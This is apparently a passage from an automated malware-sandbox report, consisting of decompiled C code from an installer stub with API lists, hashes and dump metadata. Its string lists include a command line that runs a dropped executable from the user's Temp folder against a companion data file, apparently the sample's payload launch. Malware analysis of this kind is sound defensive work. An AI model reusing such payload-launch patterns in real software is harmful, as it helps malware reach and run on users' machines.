							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405CAC(0x3fb, _t146);
							if(E0040603F(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E00406668(0x421718, _t146);
							_t87 = E00406A35(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406668(0x421718, _t146);
								_t89 = E00405FE2(0x421718);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x421718,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x421718) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x421718,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405F83(0x421718);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x421718) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404F52(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x42923c + 0x10)) != _t158) {
									E00404F3A(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x421708);
									} else {
										E00404E71(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42a304 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004045E6(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x423738 == _t158) {
									E00404A0E();
								}
								 *0x423738 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x423748;
							_v60 = E00404E0B;
							_v56 = _t146;
							_v68 = E004066A5(_t146, 0x423748, _t167, 0x421f20, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405F37(_t146);
								_t125 =  *((intOrPtr*)( *0x42a270 + 0x11c));
								if( *((intOrPtr*)( *0x42a270 + 0x11c)) != 0 && _t146 == 0x435800) {
									E004066A5(_t146, 0x423748, _t167, 0, _t125);
									if(lstrcmpiW(0x428200, 0x423748) != 0) {
										lstrcatW(_t146, 0x428200);
									}
								}
								 *0x423738 =  *0x423738 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405FAE(_t146) != 0 && E00405FE2(_t146) == 0) {
						E00405F37(_t146);
					}
					 *0x429238 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004045C4(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004045C4(_t167);
					E004045F9(_t166);
					_t138 = E00406A35(8);
					if(_t138 == 0) {
						L53:
						return E0040462B(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}













































                    0x00404ab5
                    0x00404abb
                    0x00404ac1
                    0x00404ace
                    0x00404adc
                    0x00404adf
                    0x00404ae7
                    0x00404aed
                    0x00404aed
                    0x00404af9
                    0x00404afc
                    0x00404b6a
                    0x00404b71
                    0x00404c48
                    0x00404c4f
                    0x00404c5e
                    0x00404c5e
                    0x00404c62
                    0x00404c6c
                    0x00404c79
                    0x00404c7b
                    0x00404c7b
                    0x00404c89
                    0x00404c90
                    0x00404c97
                    0x00404c9a
                    0x00404cd6
                    0x00404cd8
                    0x00404cde
                    0x00404ce3
                    0x00404ce7
                    0x00404ce9
                    0x00404ce9
                    0x00404d05
                    0x00000000
                    0x00404d07
                    0x00404d0a
                    0x00404d18
                    0x00404d1e
                    0x00404d1f
                    0x00404d22
                    0x00404d25
                    0x00000000
                    0x00404d25
                    0x00404c9c
                    0x00404c9e
                    0x00404ca2
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00404ca4
                    0x00404ca4
                    0x00404cb1
                    0x00404cb6
                    0x00000000
                    0x00000000
                    0x00404cba
                    0x00404cbc
                    0x00404cbc
                    0x00404cc5
                    0x00404cc7
                    0x00404ccc
                    0x00404ccf
                    0x00404cd4
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00404cd4
                    0x00404d31
                    0x00404d3b
                    0x00404d3e
                    0x00404d41
                    0x00404d48
                    0x00404d48
                    0x00404d4a
                    0x00404d4a
                    0x00404d4f
                    0x00404d51
                    0x00404d59
                    0x00404d60
                    0x00404d62
                    0x00404d6d
                    0x00404d6d
                    0x00404d62
                    0x00404d7d
                    0x00404d87
                    0x00404d8f
                    0x00404daa
                    0x00404d91
                    0x00404d9a
                    0x00404d9a
                    0x00404d8f
                    0x00404daf
                    0x00404db4
                    0x00404db9
                    0x00404dc2
                    0x00404dc2
                    0x00404dcb
                    0x00404dcd
                    0x00404dcd
                    0x00404dd9
                    0x00404de1
                    0x00404deb
                    0x00404deb
                    0x00404df0
                    0x00000000
                    0x00404df0
                    0x00404c9a
                    0x00404c51
                    0x00404c58
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00404c58
                    0x00404b77
                    0x00404b80
                    0x00404b9a
                    0x00404b9f
                    0x00404ba9
                    0x00404bb0
                    0x00404bbc
                    0x00404bbf
                    0x00404bc2
                    0x00404bc9
                    0x00404bd1
                    0x00404bd4
                    0x00404bd8
                    0x00404bdf
                    0x00404be7
                    0x00404c41
                    0x00404be9
                    0x00404bea
                    0x00404bf1
                    0x00404bfb
                    0x00404c03
                    0x00404c10
                    0x00404c24
                    0x00404c28
                    0x00404c28
                    0x00404c24
                    0x00404c2d
                    0x00404c3a
                    0x00404c3a
                    0x00404be7
                    0x00000000
                    0x00404b9f
                    0x00404b8d
                    0x00000000
                    0x00000000
                    0x00404b93
                    0x00000000
                    0x00404afe
                    0x00404b0b
                    0x00404b14
                    0x00404b21
                    0x00404b21
                    0x00404b28
                    0x00404b2e
                    0x00404b37
                    0x00404b3a
                    0x00404b3d
                    0x00404b45
                    0x00404b48
                    0x00404b4b
                    0x00404b51
                    0x00404b58
                    0x00404b5f
                    0x00404df6
                    0x00404e08
                    0x00404b65
                    0x00404b68
                    0x00000000
                    0x00404b68
                    0x00404b5f

                    APIs
                    • GetDlgItem.USER32 ref: 00404B04
                    • SetWindowTextW.USER32(00000000,?), ref: 00404B2E
                    • SHBrowseForFolderW.SHELL32(?), ref: 00404BDF
                    • CoTaskMemFree.OLE32(00000000), ref: 00404BEA
                    • lstrcmpiW.KERNEL32("C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo,00423748,00000000,?,?), ref: 00404C1C
                    • lstrcatW.KERNEL32(?,"C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo), ref: 00404C28
                    • SetDlgItemTextW.USER32 ref: 00404C3A
                      • Part of subcall function 00405CAC: GetDlgItemTextW.USER32(?,?,00000400,00404C71), ref: 00405CBF
                      • Part of subcall function 004068EF: CharNextW.USER32(?,*?|<>/":,00000000,00000000,7476FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                      • Part of subcall function 004068EF: CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                      • Part of subcall function 004068EF: CharNextW.USER32(?,00000000,7476FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                      • Part of subcall function 004068EF: CharPrevW.USER32(?,?,7476FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                    • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404CFD
                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D18
                      • Part of subcall function 00404E71: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                      • Part of subcall function 00404E71: wsprintfW.USER32 ref: 00404F1B
                      • Part of subcall function 00404E71: SetDlgItemTextW.USER32 ref: 00404F2E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                    • String ID: "C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo$A$H7B
                    • API String ID: 2624150263-395256101
                    • Opcode ID: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                    • Instruction ID: 9155a42c54a3203d4d9709c494e168d8d926bd307d67cbb08bf4d9f42020e7e3
                    • Opcode Fuzzy Hash: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                    • Instruction Fuzzy Hash: 94A171F1900219ABDB11EFA5CD41AAFB7B8EF84315F11843BF601B62D1D77C8A418B69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004021AA Relevance: 1.6, APIs: 1, Instructions: 129comCOMMON
                    Download Yara Rule
                    C-Code - Quality: 67%
                    			E004021AA() {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405FAE( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402DA6(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, 0x436000);
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}






















                    0x004021b3
                    0x004021bd
                    0x004021c7
                    0x004021d1
                    0x004021dc
                    0x004021df
                    0x004021f9
                    0x004021fc
                    0x00402202
                    0x00402205
                    0x0040220f
                    0x00402213
                    0x00402213
                    0x00402218
                    0x00402229
                    0x00402231
                    0x004022e8
                    0x004022e8
                    0x004022ef
                    0x00402237
                    0x00402237
                    0x00402246
                    0x0040224a
                    0x0040224d
                    0x00402253
                    0x00402261
                    0x00402264
                    0x00402266
                    0x00402271
                    0x00402271
                    0x00402276
                    0x00402278
                    0x0040227f
                    0x0040227f
                    0x00402282
                    0x0040228b
                    0x0040228e
                    0x00402294
                    0x00402296
                    0x004022a0
                    0x004022a0
                    0x004022a3
                    0x004022ac
                    0x004022af
                    0x004022b8
                    0x004022be
                    0x004022c0
                    0x004022ce
                    0x004022ce
                    0x004022d1
                    0x004022d7
                    0x004022d7
                    0x004022da
                    0x004022e0
                    0x004022e6
                    0x004022fb
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004022e6
                    0x004022f1
                    0x00402c2d
                    0x00402c39

                    APIs
                    • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: CreateInstance
                    • String ID:
                    • API String ID: 542301482-0
                    • Opcode ID: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                    • Instruction ID: f110e38d5ccd8909b9e85e2ea6b1342c5fae2602ce40754bea02e3b472428d32
                    • Opcode Fuzzy Hash: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                    • Instruction Fuzzy Hash: BC411771A00209EFCF40DFE4C989E9D7BB5BF49304B20456AF505EB2D1DB799981CB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 39%
                    			E0040290B(short __ebx, short* __edi) {
				void* _t21;

				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
					E004065AF( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E00406668();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}




                    0x00402923
                    0x0040293e
                    0x00402949
                    0x0040294a
                    0x00402a94
                    0x00402925
                    0x00402928
                    0x0040292b
                    0x0040292e
                    0x0040292e
                    0x00402c2d
                    0x00402c39

                    APIs
                    • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: FileFindFirst
                    • String ID:
                    • API String ID: 1974802433-0
                    • Opcode ID: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                    • Instruction ID: b84bdfeecc4e8c0803ac0e71b8711fc90ef1d688bdc4be786e729a17b55638d3
                    • Opcode Fuzzy Hash: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                    • Instruction Fuzzy Hash: 47F05E71A04105EBDB01DBB4EE49AAEB378EF14314F60457BE101F21D0E7B88E529B29
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00405031 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 96%
                    			E00405031(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x42a288;
				_v28 =  *0x42a270 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x42a279 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
									}
									_t238 = _v16;
									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
								_t245 = E00404F7F(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
									_t301 = _t245 * 0x818 + _t94;
									_t247 =  *_t301;
									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x42a278) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x42372c;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x423740;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x42372c = 0;
								 *0x423740 = 0;
								 *0x42a2c0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42a279 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00404FFF();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x423740;
									_t201 =  *0x42a288;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42a28c <= 0) {
										L86:
										if( *0x42a31e == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										if( *((intOrPtr*)( *0x42923c + 0x10)) != 0) {
											E00404F3A(0x3ff, 0xfffffffb, E00404F52(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x206]);
									} while (_v24 <  *0x42a28c);
									goto L86;
								} else {
									_t293 = E004012E2( *0x423740);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x42a2c0 = _t291;
					 *0x423740 = GlobalAlloc(0x40,  *0x42a28c << 2);
					_t258 = LoadImageW( *0x42a260, 0x6e, 0, 0, 0, 0);
					 *0x423734 =  *0x423734 | 0xffffffff;
					_t297 = _t258;
					 *0x42373c = SetWindowLongW(_v8, 0xfffffffc, E0040563E);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42372c = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x42372c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066A5(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E004045C4(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E004045C4(_a4);
					_t300 = 0;
					_v16 = 0;
